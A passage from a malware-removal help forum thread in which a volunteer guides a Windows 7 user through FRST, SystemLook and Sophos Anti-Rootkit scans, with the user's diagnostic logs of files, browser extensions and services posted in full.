2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-20 17:01 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-20 17:01 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-19 20:07 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 20:07 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-19 19:58 - 2018-01-12 17:33 - 001665384 _____ (Microsoft Corporation) C:\Users\Martin\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe
[2018-01-05 13:05] - [2018-01-01 02:50] - 000455680 _____ (Microsoft Corporation) 11D6A262B617130F7C16E308C12E0D41

C:\Windows\system32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\system32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\system32\services.exe => MD5 is legit
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\system32\rpcss.dll
[2018-01-05 13:05] - [2018-01-01 03:18] - 000512000 _____ (Microsoft Corporation) BA6C9EE518A11DA4AD061B223EBED3D3

C:\Windows\system32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\system32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================



#8 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 20 March 2018 - 01:16 PM

Hi,
Download the Sustemlook appropriate for you system.

SystemLook (32-Bit Version) or SystemLook (64-Bit Version)


SystemLook (32-Bit Version) or SystemLook (64-Bit Version)
  • Double-click SystemLook.exe/SystemLook_x64.exe
  • to run it.
  • Copy and paste the content of the following bold text into the main textfield:
  • :reg
    HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.
  • ===

    If the SystemLook.txt file is to long to post attach it.


Edited by nasdaq, 20 March 2018 - 01:18 PM.


#9 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 20 March 2018 - 02:17 PM

SystemLook 04.09.10 by jpshortstuff
Log created at 20:11 on 20/03/2018 by Martin
Administrator - Elevation successful

========== reg ==========

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run]
(No values found)


-= EOF =-



#10 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 21 March 2018 - 07:34 AM



Hi,

Each time we delete the Zero byte driver it is recreated. It could be caused by a rootkit infection.

Download and run the Sophos Rootkit removal.
https://www.sophos.com/en-us/products/free-tools/sophos-anti-rootkit.aspx

===

When completed and after a restart of the computer delete the copy of the Farbar program.

Download and run the new version. Post the logs for my review.
Download the version of this tool for your operating system.
Farbar Recovery Scan Tool (64 bit)
Farbar Recovery Scan Tool (32 bit)
and save it to a folder on your computer's Desktop.
Double-click to run it. When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

How to attach a file to your reply:
In the Reply section in the bottom of the topic Click the "more reply Options" button.
attachlogs.png

Attach the file.
Select the "Choose a File" navigate to the location of the File.
Click the file you wish to Attach.
Click Attach this file.
Click the Add reply button.
===


Please post the logs for my review.

Let me know what problem persists.

#11 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 22 March 2018 - 01:00 AM

Hello!

 

At first, I could not install Sopohs Rootkit removal. I got a prompt saying that Windows installer service was unable. However, I did manage to install it after enabling that service in the msconfig. When starting the program, I got a prompt saying it might not be up to date, since it couldn't update due to no network connection. After running the scan, it found and deleted 5 items.

 

Here is the FRST-log. The Addition-log is attached as you requested.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (22-03-2018 06:55:44)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ATTENTION: => Could not perform signature verification. Cryptographic Service is not running.

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios)
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
